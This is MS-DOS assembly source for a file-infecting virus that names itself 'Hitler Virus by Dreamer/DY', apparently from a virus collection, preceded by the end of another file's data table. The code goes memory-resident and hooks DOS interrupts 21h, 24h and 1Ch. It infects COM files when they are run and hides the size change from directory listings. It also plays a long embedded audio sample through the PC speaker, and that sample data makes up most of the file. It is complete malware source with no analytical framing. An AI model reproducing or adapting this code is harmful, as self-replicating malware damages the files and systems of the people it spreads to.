db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt:
size equ $-100h
pgf equ ($+16)/16

MSDOS/H-Index/Virus.MSDOS.Unknown.hitler_.asm
+701
View File
@@ -0,0 +1,701 @@
call rakett
old db !­'
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh
int 21h
jnc failed
cli
mov ax,3521h
int 21h
mov w [bp+offset old21],bx
mov w [bp+offset old21+2],es
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380
sti
call normalspeed
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21
int 21h
mov al,1Ch
mov dx,offset ni1C
int 21h
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret
findFCB: popf
call int21
pushf
or al,al
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax
push bx
push dx
push es
mov ah,2Fh
call int21
cmp byte es:[bx],0FFh
jne normFCB
add bx,8
normFCB: mov al,byte es:[bx+16h]
and al,31
xor al,31
jnz shitFCB
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size
sbb dx,0
jc shitFCB
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB:
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h
je findFCB
cmp ah,12h
je findFCB
cmp ax,42ABh
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h
jne not_4B00
call install_24
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h
call int21
jc back1
mov cs:old_attr,cx
test cl,4
jnz back1
mov ax,4301h
xor cx,cx
call int21
jc back1
push dx
push ds
call infect
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h
call int21
jnc okay_open
bad1: ret
okay_open: xchg bx,ax
mov ax,5700h
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh
mov cx,5
mov dx,offset old
push cs
pop ds
call int21
jc close
cmp al,5
jne close
cmp word old[0],'MZ'
je close
cmp word old[0],'ZM'
je close
cmp old[0],0E9h
jne infect1
cmp word old[3],'­!'
jne infect1
close: pop dx
pop cx
mov ax,5701h
call int21
mov ah,3Eh
call int21
ret
infect1: mov ax,4202h
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000
jae close
dec ax
dec ax
dec ax
mov word ptr putjmp[1],ax
mov ah,40h
mov cx,size
mov dx,100h
call int21
jc close
cmp ax,size
jne close
mov ax,4200h
xor cx,cx
xor dx,dx
call int21
mov ah,40h
mov cx,5
mov dx,offset putjmp
call int21
or byte ss:[bp],31
jmp close
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf
cli
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
cmp teller,0
je teller_ok
dec teller
jmp noreset
teller_ok:
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample
jb noreset
mov xofs,offset sample
noreset:
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
